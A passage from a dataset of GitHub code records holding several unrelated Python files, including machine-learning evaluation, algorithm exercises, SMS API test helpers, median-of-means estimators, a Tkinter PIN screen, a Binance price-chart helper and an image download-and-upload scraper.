kn.predict(x_test_out)\nprint(f'y de prediccion: {y_pred}')\nprint(f'Y real :{y_test_out}')\nprint('Vecino mas cercano Validación cruzada')\n\n# Accuracy de Entrenamiento de Entrenamiento\nprint(f'accuracy de Entrenamiento de Entrenamiento: {np.array(acc_scores_train_train).mean()}')\n\n# Accuracy de Test de Entrenamiento\nprint(f'accuracy de Test de Entrenamiento: {np.array(acc_scores_test_train).mean()}')\n\n# Accuracy de Validación\nprint(f'accuracy de Validación: {kn.score(x_test_out, y_test_out)}')\n\n\n# Matriz de confusión\nprint(f'Matriz de confusión Vecino mas cercano: {confusion_matrix(y_test_out, y_pred)}')\n\nmatriz_confusion = confusion_matrix(y_test_out, y_pred)\nplt.figure(figsize = (6, 6))\nsns.heatmap(matriz_confusion)\nplt.title(\"Mariz de confución Vecino mas cercano\")\n\nprecision = precision_score(y_test_out, y_pred, average=None).mean()\nprint(f'Precisión: {precision}')\n\nrecall = recall_score(y_test_out, y_pred, average=None).mean()\nprint(f'Re-call: {recall}')\n\nf1_score_5 = f1_score(y_test_out, y_pred, average=None).mean()\n\nprint(f'f1: {f1_score_5}')\n\n \n","repo_name":"checho2820/TallerAI","sub_path":"Diabetes/Diabetes.py","file_name":"Diabetes.py","file_ext":"py","file_size_in_byte":9861,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"35676631606","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sat Mar 24 11:52:05 2018\r\n\r\n@author: atul\r\n\"\"\"\r\n\r\ndef fact(n):\r\n if n ==0 or n==1:\r\n return 1\r\n else:\r\n return n*fact(n-1)\r\n \r\nfor i in range(11):\r\n print(fact(i))","repo_name":"atulanandnitt/questionsBank","sub_path":"recursion/factorial.py","file_name":"factorial.py","file_ext":"py","file_size_in_byte":230,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"8386221242","text":"# -*- coding: utf-8 -*-\n\nimport os\nimport json\nimport unittest\nimport pkgutil\nimport requests\n\nfrom smsapi.api import Api\nfrom smsapi.client import SmsApiPlClient\nfrom smsapi.models import ResultCollection\nfrom smsapi.sms import response_format_param\nfrom smsapi.sms.model import SmsSendResult\n\nfrom tests.unit.doubles import ApiSpy, request_fake\nfrom tests.unit.fixtures import create_send_result\n\nrequests.request = request_fake\n\n\nclass SmsApiTestCase(unittest.TestCase):\n\n def setUp(self):\n self.request_fake = request_fake\n\n self.client = SmsApiPlClient(access_token='some-access-token')\n\n spy_endpoints(self.client)\n\n def load_fixture(self, dir, fixture):\n with open(os.path.abspath(os.path.dirname(__file__)) + '/%s/fixtures/%s.json' % (dir, fixture)) as f:\n data = f .read()\n\n return json.loads(data)\n\n def assertParamsForwardedToRequestEquals(self, params, *args):\n for d in args:\n params.update(d or {})\n\n params.update(response_format_param)\n\n self.assertEqual(params, self.request_fake.payload)\n\n def assertRequestPayloadContains(self, key, value):\n self.assertIn(key, self.request_fake.payload.keys())\n self.assertIn(value, self.request_fake.payload.values())\n\n def assertSendResultForNumberEquals(self, number, result, result_class=ResultCollection):\n numbers = number if isinstance(number, list) else [number]\n\n expected_result = result_class(len(numbers), [create_send_result(n) for n in numbers])\n\n self.assertEqual(expected_result, result)\n\n def assertSmsSendResultForNumberEquals(self, number, result):\n self.assertSendResultForNumberEquals(number, result, result_class=SmsSendResult)\n\n\ndef spy_endpoints(client):\n\n for attr in client.__dict__:\n if isinstance(client.__dict__[attr], Api):\n client.__dict__[attr] = ApiSpy(client.__dict__[attr])\n\n\ndef import_from_string(name):\n\n if '.' in name:\n module, pkg = name.rsplit(\".\", 1)\n else:\n return __import__(name)\n\n return getattr(__import__(module, None, None, [pkg]), pkg)\n\n\ndef app_test_suites(module_name):\n\n module = import_from_string(module_name)\n\n path = getattr(module, '__path__', None)\n\n if not path:\n raise ValueError('%s is not a package' % module)\n\n basename = module.__name__ + '.'\n\n for importer, module_name, is_pkg in pkgutil.iter_modules(path):\n module_name = basename + module_name\n\n if is_pkg:\n for suite in app_test_suites(module_name):\n yield suite\n\n module = import_from_string(module_name)\n\n if hasattr(module, 'suite'):\n yield module.suite()\n\n\ndef suite():\n suite = unittest.TestSuite()\n for _suite in app_test_suites(__name__):\n suite.addTest(_suite)\n return suite\n\n\ndef run_tests():\n try:\n unittest.TextTestRunner(verbosity=2).run(suite())\n except Exception as e:\n print('Error: %s' % e)\n\n\nif __name__ == '__main__':\n run_tests()","repo_name":"smsapi/smsapi-python-client","sub_path":"tests/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3030,"program_lang":"python","lang":"en","doc_type":"code","stars":53,"dataset":"github-code","pt":"37"} +{"seq_id":"26055268254","text":"# 두 배열의 합 # B_2143\n# 부분수열의 합2 와 같은 문제\n# 부분수의 합2 # B_1208\n# 중간에서 만나기 / 교안참고\n# N개가 있다고 할 때 M=2/N개 N-M개로 나누어 계산하여 시간복잡도를 줄임\nfrom collections import Counter\n\ngoal = int(input())\n\nn = int(input())\na = list(map(int, input().split()))\n\nm = int(input())\nb = list(map(int, input().split()))\n\nfirst, second = [], []\n\n# first, second: a 와 b 각 수열의 합으로 나타낼 수 있는 부분 집합들\nfor i in range(n):\n sum = 0\n for j in range(i,n):\n sum += a[j]\n first.append(sum)\nfor i in range(m):\n sum = 0\n for j in range(i,m):\n sum += b[j]\n second.append(sum)\n\nfirst.sort()\nsecond.sort()\nc = Counter(second)\nans = 0\n\nfor num in first:\n \"\"\"\n (c[goal-num])? : goal-fisrt요소 = 필요한 second요소\n # goal:5 , fisrt = [1,1,2,3,3,4,4]라면\n # 5-1 = 4이므로 5가되기 위한 4가 second 리스트에 몇개 있는지 조사\n \"\"\"\n ans += c[goal-num]\nprint(ans)","repo_name":"snowedev/baekjoon-code.plus","sub_path":"baekjoon/[Bruteforce]/연습/[Brute_Force]두 배열의 합.py","file_name":"[Brute_Force]두 배열의 합.py","file_ext":"py","file_size_in_byte":1035,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"16352801498","text":"from logging import getLogger\nfrom typing import Sequence\n\nfrom matplotlib.axes import Axes\nfrom numpy import ones, stack\n\nfrom sharp.config.load import config\nfrom sharp.data.files.figure import FigureTarget\nfrom sharp.data.hardcoded.style import paperfig, readable\nfrom sharp.data.types.aliases import subplots\nfrom sharp.data.types.signal import Signal\nfrom sharp.data.types.split import TrainTestSplit\nfrom sharp.tasks.plot.base import FigureMaker, plot_signal_neat\nfrom sharp.tasks.plot.paper import output_dir, rm, sweepers, colors, get_tes\nfrom sharp.tasks.plot.util.annotations import add_segments, add_event_arrows\nfrom sharp.tasks.plot.util.scalebar import (\n add_time_scalebar,\n add_voltage_scalebar,\n)\n\nlog = getLogger(__name__)\n\n\nclass PlotSignals(FigureMaker):\n def requires(self):\n return (rm,) + sweepers\n\n def output(self):\n return self.outputs\n\n @property\n def outputs(self) -> Sequence[FigureTarget]:\n return [\n FigureTarget(output_dir, f\"signals {trange[0]:.2f}\")\n for trange in config.time_ranges\n ]\n\n def work(self):\n nrows = 5\n axheights = ones(nrows)\n axheights[0] = 2\n axheights[1:3] = 0.84\n for trange, output in zip(config.time_ranges, self.outputs):\n log.info(f\"Generating figure {output.filename}\")\n fig, axes = subplots(\n nrows=nrows,\n figsize=paperfig(0.57, 0.75),\n gridspec_kw=dict(height_ratios=axheights),\n )\n self.plot_input(axes[0], trange)\n self.plot_offline(axes[1:3], trange)\n self.plot_online(axes[3:], trange)\n add_time_scalebar(axes[0], 200, in_layout=False, pos_along=0.56)\n fig.tight_layout()\n output.write(fig)\n\n def plot_input(self, ax, trange):\n LFP_data = stack(\n [rm.sr_channel, rm.ripple_channel, rm.toppyr_channel], axis=1\n )\n LFP = Signal(LFP_data, rm.sr_channel.fs)\n plot_sig(LFP, ax, trange)\n add_voltage_scalebar(ax)\n # add_segs(ax, rm.output().read())\n\n def plot_offline(self, axes, trange):\n ax_SW = axes[0]\n ax_ripple = axes[1]\n plot_sig(rm.SW_envelope, ax_SW, trange)\n plot_sig(rm.ripple_envelope, ax_ripple, trange, tight_ylims=True)\n add_voltage_scalebar(ax_SW, pos_along=0.34)\n add_voltage_scalebar(ax_ripple, 100, pos_along=0.07)\n add_segs(ax_SW, rm.calc_SW_segments())\n add_segs(ax_ripple, rm.calc_ripple_segments())\n\n def plot_online(self, axes, trange):\n for i, (sweeper, te, color) in enumerate(\n zip(sweepers, get_tes(), colors)\n ):\n ax: Axes = axes[i]\n plot_sig(sweeper.envelope_maker.envelope, ax, trange, color=color)\n ax.hlines(\n te.threshold,\n *trange,\n linewidths=0.3 * readable[\"lines.linewidth\"],\n )\n add_event_arrows(ax, te.correct_detections, color=\"green\")\n add_event_arrows(ax, te.incorrect_detections, color=\"red\")\n add_segs(ax, rm.output().read())\n\n\ndef plot_sig(sig, ax, trange, **kwargs):\n plot_signal_neat(test_part(sig), trange, ax=ax, **kwargs)\n\n\ndef add_segs(ax, segs):\n add_segments(ax, test_part(rm.sr_channel, segs), color=\"grey\")\n\n\ndef test_part(sig, segs=None):\n if segs is None:\n return TrainTestSplit(sig).signal_test\n else:\n return TrainTestSplit(sig, segs).segments_test\n","repo_name":"tfiers/sharp","sub_path":"sharp/tasks/plot/paper/signals.py","file_name":"signals.py","file_ext":"py","file_size_in_byte":3509,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"73884304748","text":"#https://www.e-olymp.com/uk/submissions/7375203\n\nclass Node():\n def __init__(self, item):\n self.item = item\n self.next = None\n\nclass Stack():\n def __init__(self):\n self.top_node = None\n self.currentSize = 0\n\n def empty(self):\n return self.top_node is None\n\n def push(self, item):\n node = Node(item)\n\n if not self.empty():\n node.next = self.top_node\n\n self.top_node = node\n self.currentSize += 1\n\n return 'ok'\n\n def back(self):\n if self.empty():\n return 'error'\n else:\n return self.top_node.item\n\n def pop(self):\n if self.empty():\n return 'error'\n else:\n current_top = self.top_node\n item = current_top.item\n self.top_node = current_top.next\n self.currentSize -= 1\n del current_top\n return item\n\n def size(self):\n return self.currentSize\n\n def clear(self):\n self.currentSize = 0\n\n while not self.top_node is None:\n current_top = self.top_node\n self.top_node = current_top.next\n del current_top\n\n return 'ok'\n\n def exit(self):\n return 'bye'\n\n def execute(self, command):\n if command.startswith('push'):\n return self.push(command[5:])\n else:\n return getattr(self, command)()\n\nif __name__ == '__main__':\n stack = Stack()\n\n with open('input.txt') as input:\n with open('output.txt', 'w') as output:\n for line in input:\n result = stack.execute(line.rstrip())\n print(result, file=output)\n\n if result == 'bye':\n break","repo_name":"Invalid-coder/Data-Structures-and-algorithms","sub_path":"Linear_structures/Stack/Tasks/eolymp(6124).py","file_name":"eolymp(6124).py","file_ext":"py","file_size_in_byte":1738,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70604526507","text":"from bs4 import BeautifulSoup\nimport urllib.request\n\nnumber_of_pages = 10\nrandomize_link = 'https://www.wikihow.com/Special:Randomizer'\n\nfor i in range(number_of_pages):\n http_doc = urllib.request.urlopen(randomize_link).read()\n soup = BeautifulSoup(http_doc)\n\n","repo_name":"frasmataz/ml101","sub_path":"wikihow-image-scraper/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":267,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"6822486489","text":"import numpy as np\nfrom numba import njit\nfrom sklearn.metrics.pairwise import euclidean_distances\n\n\n#####################\n# #\n# MoM Estimator #\n# #\n#####################\n\ndef partition_blocks(X, K):\n \"\"\"Partition X into K disjoint blocks as large as possible\n \"\"\"\n # get largest block size (should be at least 1)\n n = len(X)\n B = n // K\n if B == 0:\n raise ValueError(\"Invalid number of blocks %s, \"\n \"larger than number of samples %s\" % (K, n))\n\n # create and return blocks (plus block size)\n np.random.shuffle(X)\n X = X[:K * B]\n blocks = np.array(np.split(X, K))\n\n return blocks, B\n\n\ndef MoM(X, K):\n \"\"\"Compute mom estimate with K blocks\n \"\"\"\n blocks, _ = partition_blocks(X, K)\n means = np.mean(blocks, axis=1)\n mom = np.median(means)\n\n return mom\n\n\n#######################\n# #\n# MoRM Estimators #\n# #\n#######################\n\n@njit\ndef swor(n, p):\n \"\"\"Efficient SWoR\n \"\"\"\n idx = np.zeros(p, dtype=np.int32)\n mask = np.ones(n, dtype=np.bool_)\n count = 0\n\n while count < p:\n i = np.random.randint(low=0, high=n)\n if mask[i]:\n mask[i] = 0\n idx[count] = i\n count += 1\n\n return idx\n\n\ndef swor_blocks(X, K, B):\n \"\"\"Sample K SWoR blocks of size B from X\n \"\"\"\n n, d = X.shape\n blocks = np.zeros((K, B, d))\n\n for k in range(K):\n idx = swor(n, B)\n blocks[k, :, :] = X[idx, :]\n\n return blocks\n\n\n@njit\ndef mc(n, p):\n \"\"\"Efficient MC\n \"\"\"\n idx = np.zeros(p, dtype=np.int32)\n for i in range(p):\n idx[i] = np.random.randint(low=0, high=n)\n return idx\n\n\ndef mc_blocks(X, K, B):\n \"\"\"Sample K MC blocks of size B from X\n \"\"\"\n n, d = X.shape\n blocks = np.zeros((K, B, d))\n\n for k in range(K):\n idx = mc(n, B)\n blocks[k, :, :] = X[idx, :]\n\n return blocks\n\n\ndef MoRM(X, K, B, sampling='SWoR'):\n \"\"\"Compute morm estimate with K blocks of size B\n \"\"\"\n if sampling == 'SWoR':\n blocks = swor_blocks(X, K, B)\n elif sampling == 'MC':\n blocks = mc_blocks(X, K, B)\n\n means = np.mean(blocks, axis=1)\n morm = np.median(means)\n\n return morm\n\n\n###############################\n# #\n# Mo(I)U-stats Estimators #\n# #\n###############################\n\ndef u_mat(X, kernel='squared_norm'):\n \"\"\"Compute comparison matrix from specified kernel\n To modify in order to allow for more kernels\n \"\"\"\n if kernel == 'squared_norm':\n M = euclidean_distances(X)\n M **= 2\n M /= 2\n\n # elif kernel == 'my_kernel':\n # M = my_kernel(X)\n\n return M\n\n\ndef ustat_c(X, kernel='squared_norm'):\n \"\"\"Compute complete Ustat from specified kernel\n \"\"\"\n n = len(X)\n M = u_mat(X, kernel=kernel)\n U = M.sum() - np.trace(M)\n U /= n * (n - 1)\n return U\n\n\ndef MoCU(X, K, kernel='squared_norm', sampling='partition', B=10):\n \"\"\"Compute mocu estimate from specified kernel\n \"\"\"\n # sample blocks\n if sampling == 'partition':\n blocks, B = partition_blocks(X, K)\n if B < 2:\n raise ValueError(\"Invalid number of blocks %s, \"\n \"less than 2 samples per block\")\n elif sampling == 'SWoR':\n blocks = swor_blocks(X, K, B)\n elif sampling == 'MC':\n blocks = mc_blocks(X, K, B)\n\n # compute complete ustats and return mocu\n Ustats = np.zeros(K)\n for k, block in enumerate(blocks):\n Ustats[k] = ustat_c(block, kernel=kernel)\n mocu = np.median(Ustats)\n\n return mocu\n\n\ndef u_vec(X1, X2, kernel='squared_norm'):\n \"\"\"Compute comparison vector from specified kernel\n To modify in order to allow for more kernels\n \"\"\"\n if kernel == 'squared_norm':\n Y = X1 - X2\n v = np.linalg.norm(Y, axis=1)\n v **= 2\n v /= 2\n\n # elif kernel == 'my_kernel':\n # v = my_kernel(X1, X2)\n\n return v\n\n\ndef ustat_i(X1, X2, kernel='squared_norm'):\n \"\"\"Compute incomplete Ustat based on X1 and X2 and specified kernel\n \"\"\"\n v = u_vec(X1, X2, kernel=kernel)\n U = np.mean(v)\n return U\n\n\ndef pix_to_dix(k, n):\n \"\"\"Transform an index on the pairs (from 0 to n(n-1) - 1) into the double\n index of the corresponding pair (with symmetry)\n \"\"\"\n # standard transformation\n i = k // (n - 1)\n j = k % (n - 1)\n # to remove diagonal\n c0 = i < n - 1\n c1 = j >= i\n j += c0 * c1\n return i, j\n\n\ndef MoIU(X, K, B, kernel='squared_norm', sampling='SWoR'):\n \"\"\"Compute moiu estimate from specified kernel\n \"\"\"\n n = len(X)\n Ustats = np.zeros(K)\n\n for k in range(K):\n if sampling == 'SWoR':\n p_idxs = swor(n * (n - 1), B)\n elif sampling == 'MC':\n p_idxs = mc(n * (n - 1), B)\n\n d_idxs = np.array(pix_to_dix(p_idxs, n))\n\n X1 = X[d_idxs[0, :]]\n X2 = X[d_idxs[1, :]]\n\n Ustats[k] = ustat_i(X1, X2)\n\n moiu = np.median(Ustats)\n\n return moiu\n","repo_name":"plaforgue/morm","sub_path":"morm/morm.py","file_name":"morm.py","file_ext":"py","file_size_in_byte":5078,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"40268625690","text":"from tkinter import*\r\nfrom tkinter import messagebox\r\nimport sqlite3\r\nimport random\r\nimport string\r\n\r\ndef mainwindow() :\r\n root=Tk()\r\n x = root.winfo_screenwidth()/2 - w/2\r\n y = root.winfo_screenheight()/2 - h/2\r\n root.geometry(\"%dx%d+%d+%d\"%(w,h,x,y))\r\n root.config(bg='#a90432')\r\n root.title(\"Agentask\")\r\n root.option_add('*font','Garamond 20 bold')\r\n return root\r\n\r\ndef createconnection() :\r\n global conn,cursor\r\n conn = sqlite3.connect('agentask.db')\r\n cursor = conn.cursor()\r\n\r\ndef changepin(root) :\r\n global oldp_ent,newp_ent,cfnewp_ent\r\n root.title(\"Change Pin\")\r\n changepin_frm=Frame(root,bg='#a90432')\r\n changepin_frm.pack()\r\n changepin_frm.columnconfigure((0,1),weight=1)\r\n changepin_frm.rowconfigure((0,8),weight=2)\r\n changepin_frm.rowconfigure((1,2,3,4,5,6,7),weight=1)\r\n \r\n Label(changepin_frm,text=\"Old Pin :\",bg='#a90432',).grid(row=1,column=0,sticky='w',padx=10,pady=10)\r\n oldp_ent=Entry(changepin_frm,width=20)\r\n oldp_ent.grid(row=2,column=0,columnspan=2,pady=10)\r\n Label(changepin_frm,text=\"New Pin :\",bg='#a90432',).grid(row=3,column=0,sticky='w',padx=10,pady=10)\r\n newp_ent=Entry(changepin_frm,width=20,show='*')\r\n newp_ent.grid(row=4,column=0,columnspan=2,pady=10)\r\n Label(changepin_frm,text=\"Confirm Pin :\",bg='#a90432',).grid(row=5,column=0,sticky='w',padx=10,pady=10)\r\n cfnewp_ent=Entry(changepin_frm,width=20,show='*')\r\n cfnewp_ent.grid(row=6,column=0,columnspan=2,pady=10)\r\n \r\n Button(changepin_frm,text=\"Apply\",width=10,font='Garamond 16 bold').grid(row=7,column=0,pady=10)\r\n Button(changepin_frm,text=\"Cancel\",width=10,font='Garamond 16 bold').grid(row=7,column=1,pady=10)\r\n \r\ndef forgetpin(root) :\r\n global forget_frm\r\n root.title(\"Forget Pin\")\r\n forget_frm=Frame(root,bg='#a90432')\r\n forget_frm.pack()\r\n forget_frm.columnconfigure((0,1,2),weight=1)\r\n forget_frm.rowconfigure((0,1,2,3),weight=1)\r\n \r\n Label(forget_frm,text=\"Forget your pin?\",bg='#a90432',).grid(row=0,column=0,columnspan=3,padx=10,pady=20)\r\n Label(forget_frm,text=\"Enter your birth day to recieve new password\",font='Garamond 15',bg='#a90432',).grid(row=1,column=0,columnspan=3,padx=10,pady=20)\r\n bday_spin=Spinbox(forget_frm,width=10,from_=1,to=31)\r\n bday_spin.grid(row=2,column=0,sticky='e',padx=10)\r\n bmonth_spin=Spinbox(forget_frm,width=10,from_=1,to=12)\r\n bmonth_spin.grid(row=2,column=1,padx=10)\r\n byear_spin=Spinbox(forget_frm,width=10,from_=1951,to=2021,textvariable=yearspy)\r\n byear_spin.grid(row=2,column=2,sticky='w',padx=10)\r\n \r\n Button(forget_frm,text=\"Apply\",width=10,font='Garamond 16 bold',command=randompin).grid(row=3,column=0,columnspan=3,pady=30)\r\n \r\ndef randompin() :\r\n forget_frm.destroy()\r\n \r\n random_frm=Frame(root,bg='#a90432')\r\n random_frm.pack()\r\n random_frm.columnconfigure(0,weight=1)\r\n random_frm.rowconfigure(0,weight=2)\r\n random_frm.rowconfigure((1,2),weight=1)\r\n \r\n Label(random_frm,text=\"Here's your temporary pin!\",bg='#a90432').grid(row=0,column=0,sticky='news',pady=30)\r\n random_pin= ''.join(random.choice(string.ascii_uppercase + string.digits) for i in range(6))\r\n Label(random_frm,text=random_pin,bg='#a90432',font='Garamond 30 bold').grid(row=1,column=0,sticky='news',pady=30)\r\n Button(random_frm,text=\"OK\",width=10,font='Garamond 16 bold').grid(row=2,column=0,sticky='news',pady=30)\r\n \r\nw=600\r\nh=700\r\nroot=mainwindow()\r\n#changepin(root)\r\nyearspy=IntVar()\r\nyearspy.set(2021)\r\n#forgetpin(root)\r\n\r\nroot.mainloop()\r\n","repo_name":"SakchaiSaehoei/CS311_final_project","sub_path":"change_forgetpin.py","file_name":"change_forgetpin.py","file_ext":"py","file_size_in_byte":3543,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"35008586338","text":"from binance import Client, ThreadedWebsocketManager, ThreadedDepthCacheManager\nimport pandas as pd\nimport json\nfrom datetime import datetime\nimport Api_code\nimport time\nimport mplfinance as mpf\n\n#################### BINANCE API VARIABLES#####################\napi_key = Api_code.api_key\n\napi_secret = Api_code.api_secret\n\nclient = Client(api_key, api_secret)\n###############################################################\n\nclass Get_info:\n\n def __init__(self , coinname , interval , startdate , dataframe = []):\n '''\n format examples:\n coinname format = \"BTCUSDT\"\n interval format = \"1m\"\n fromtime format = 2020-06-06\n '''\n self.coinname =coinname\n self.interval = interval\n self.startdate = startdate\n self.dataframe = dataframe\n\n############################################\n Client.KLINE_INTERVAL_1MONTH = \"1m\"\n Client.KLINE_INTERVAL_1WEEK = \"1w\"\n Client.KLINE_INTERVAL_1DAY = \"1d\"\n Client.KLINE_INTERVAL_12HOUR = \"12h\"\n Client.KLINE_INTERVAL_6HOUR = \"6h\"\n Client.KLINE_INTERVAL_4HOUR = \"4h\"\n Client.KLINE_INTERVAL_2HOUR = \"2h\"\n Client.KLINE_INTERVAL_1HOUR = \"1h\"\n Client.KLINE_INTERVAL_30MINUTE = \"30min\"\n Client.KLINE_INTERVAL_15MINUTE =\"15min\"\n Client.KLINE_INTERVAL_5MINUTE = \"5min\"\n Client.KLINE_INTERVAL_3MINUTE = \"3min\"\n Client.KLINE_INTERVAL_1MINUTE = \"1min\"\n############################################\n def df(self):\n \n\n from_time = int(datetime.strptime(self.startdate, \"%Y-%m-%d\").timestamp()*1000)\n\n self.dataframe = pd.DataFrame(client.get_historical_klines(self.coinname , self.interval , from_time))\n self.dataframe.columns = [\"Opentime\",\"Open\",\"High\",\"Low\",\"Close\",\"Volume\",\"CloseTime\",\"QuoteAssetTime\",\"NumberOfTrades\",\"VolumeOver24HourPeriod\",\"PriceOver24HourPeriod \",\"Ignore\"]\n columns_to_float = [\"Open\",\"High\",\"Low\",\"Close\",\"Volume\",\"NumberOfTrades\"]\n self.dataframe[columns_to_float] = self.dataframe[columns_to_float].astype(float)\n self.dataframe.drop([\"Ignore\",\"QuoteAssetTime\",\"VolumeOver24HourPeriod\",\"PriceOver24HourPeriod \"],axis=1,inplace=True)\n self.dataframe[\"Opentime\"] = pd.to_datetime(self.dataframe[\"Opentime\"]/1000,unit =\"s\")\n self.dataframe[\"CloseTime\"] = pd.to_datetime(self.dataframe[\"CloseTime\"]/1000,unit =\"s\")\n\n return self.dataframe\n\n \n\n def current_price(self):\n return client.get_margin_price_index(symbol=self.coinname)[\"price\"]\n\n def show_graph(self,a,b):\n Get_info.df(self)\n return mpf.plot(self.dataframe.set_index(\"CloseTime\"),type = \"line\" ,style = \"charles\",mav =(a,b),volume = True)\n\n\na = Get_info(coinname=\"ETHUSDT\",interval = \"5min\",startdate=\"2022-06-06\")\nprint(a.df())\n\nprint(a.current_price())\n\nprint(a.show_graph(20,50))\n\n###TESTING","repo_name":"alamgirhossein041/Pytrade","sub_path":"Get_coin_info.py","file_name":"Get_coin_info.py","file_ext":"py","file_size_in_byte":2817,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"15349372317","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n\n\"\"\"\n@author: the king\n@project: zyl_company\n@file: download.py\n@time: 2022/4/21 14:17\n\"\"\"\nimport hashlib\nimport json\nimport os\nimport shutil\nfrom multiprocessing.pool import ThreadPool\nfrom os import path\n\nimport requests\nfrom pymongo import MongoClient\nfrom pymongo.errors import DuplicateKeyError\nfrom common.log_out import log_err, log\nfrom .config import ARTICLEUPLOAD, MONGO_URI, MONGO_DB\n\nclient = MongoClient(MONGO_URI)\nurl_coll = client[MONGO_DB][\"urls\"]\narticle_coll = client[MONGO_DB][\"articles\"]\nrequests.packages.urllib3.disable_warnings()\n\npicHeaders = {\n 'accept': '*/*',\n 'Accept-Encoding': 'gzip, deflate',\n 'Accept-Language': 'zh-CN,zh;q=0.9,en;q=0.8',\n 'Cache-Control': 'no-cache',\n 'Connection': 'keep-alive',\n 'Host': '27.150.182.135:8855',\n 'Origin': 'http://8.129.215.170:8855',\n 'Pragma': 'no-cache',\n 'Referer': 'http://8.129.215.170:8855/swagger-ui.html',\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.75 Safari/537.36'\n}\nvideoPageHeaders = {\n 'authority': 'v.jin10.com',\n 'method': 'GET',\n 'path': '/details.html?id=12574',\n 'scheme': 'https',\n 'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3',\n 'accept-encoding': 'gzip, deflate, br',\n 'accept-language': 'zh-CN,zh;q=0.9,en;q=0.8',\n 'cache-control': 'no-cache',\n 'pragma': 'no-cache',\n 'upgrade-insecure-requests': '1',\n 'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.75 Safari/537.36'\n}\nvideoUploadHeaders = {\n 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3',\n 'Accept-Encoding': 'gzip, deflate',\n 'Accept-Language': 'zh-CN,zh;q=0.9,en;q=0.8',\n 'Cache-Control': 'no-cache',\n 'Pragma': 'no-cache',\n 'Upgrade-Insecure-Requests': '1',\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.75 Safari/537.36'\n}\narticleHeaders = {\n 'accept': '*/*',\n 'Accept-Encoding': 'gzip, deflate',\n 'Accept-Language': 'zh-CN,zh;q=0.9,en;q=0.8',\n 'Cache-Control': 'no-cache',\n 'Connection': 'keep-alive',\n 'Content-Length': '532',\n 'Content-Type': 'application/json',\n 'Host': '8.129.215.170:8855',\n 'Origin': 'http://8.129.215.170:8855',\n 'Pragma': 'no-cache',\n # 'Referer': 'http://8.129.215.170:8855/swagger-ui.html',\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.75 Safari/537.36'\n}\nserverUrl = 'https://zuiyouliao-prod.oss-cn-beijing.aliyuncs.com/zx/image/'\nvideoServerUrl = 'http://qiniu.zuiyouliao.com/video/upload/'\npic_info = {'id': 0, 'pic_type': 3}\nimage_base_path = path.dirname(os.path.abspath(path.dirname(__file__)))\n\n# 下载/上传 图片/视频 函数\ndef DownloadPicture_Video(img_path, img_info, retry=0):\n img_url = img_info[1]\n try:\n if not str(img_url).startswith(\"http\"):return\n res = requests.get(img_url, timeout=60)\n if res.status_code == 200:\n basename = hashlib.md5(img_url.encode(\"utf8\")).hexdigest() + '.jpg'\n filename = os.path.abspath(os.path.join(img_path + '/' + basename))\n with open(filename, \"wb\") as f:\n content = res.content\n f.write(content)\n\n # upload picture\n uploadUrl = 'http://27.150.182.135:8855/api/common/upload?composeId={0}&type={1}&isNameReal=0'.format(\n pic_info['id'], pic_info['pic_type'])\n\n files = {\n 'file': (basename, open(filename, 'rb'), 'image/jpg')\n }\n picHeaders.update({\n 'Content-Length': str(os.path.getsize(filename))\n })\n\n try:\n resp = requests.post(url=uploadUrl, headers=picHeaders, files=files, timeout=60)\n if resp.json().get('message') == '携带数据成功':\n return_url = 'https://zuiyouliao-prod.oss-cn-beijing.aliyuncs.com' + resp.json().get('entity')['filePath']\n print(f\"id {pic_info['id']} *** type {pic_info['pic_type']} *** download image successfully:{img_url} *** upload {return_url}\")\n img_info.append(return_url)\n\n return img_info\n else:\n log_err(resp.json())\n except requests.exceptions.ConnectionError:\n log(f'服务器上传图片网络问题,重试中...{img_url}')\n if retry < 3:\n return DownloadPicture_Video(img_path, img_url, retry + 1)\n else:\n log_err(f'超过三次 服务器上传图片网络问题 {img_url}')\n except Exception as error:\n log_err(error)\n log_err(uploadUrl)\n except requests.exceptions.ConnectionError:\n print(f'下载图片网络问题,重试中... {img_url}')\n if retry < 3:\n return DownloadPicture_Video(img_path, img_url, retry + 1)\n except Exception as error:\n log_err(error)\n return None\n return None\n\n\n# 多线程处理数据\ndef command_thread(company_name, image_list, Async=True):\n file_path = os.path.abspath(image_base_path + f'/download_data/{company_name}')\n if not os.path.exists(file_path):\n os.makedirs(file_path)\n\n thread_list = []\n # 设置进程数\n pool = ThreadPool(processes=8)\n\n for img_info in image_list:\n print(f'------------------ {img_info}')\n if Async:\n out = pool.apply_async(func=DownloadPicture_Video, args=(file_path, img_info,)) # 异步\n else:\n out = pool.apply(func=DownloadPicture_Video, args=(file_path, img_info,)) # 同步\n thread_list.append(out)\n # break\n pool.close()\n pool.join()\n\n # 获取输出结果\n com_list = []\n if Async:\n for p in 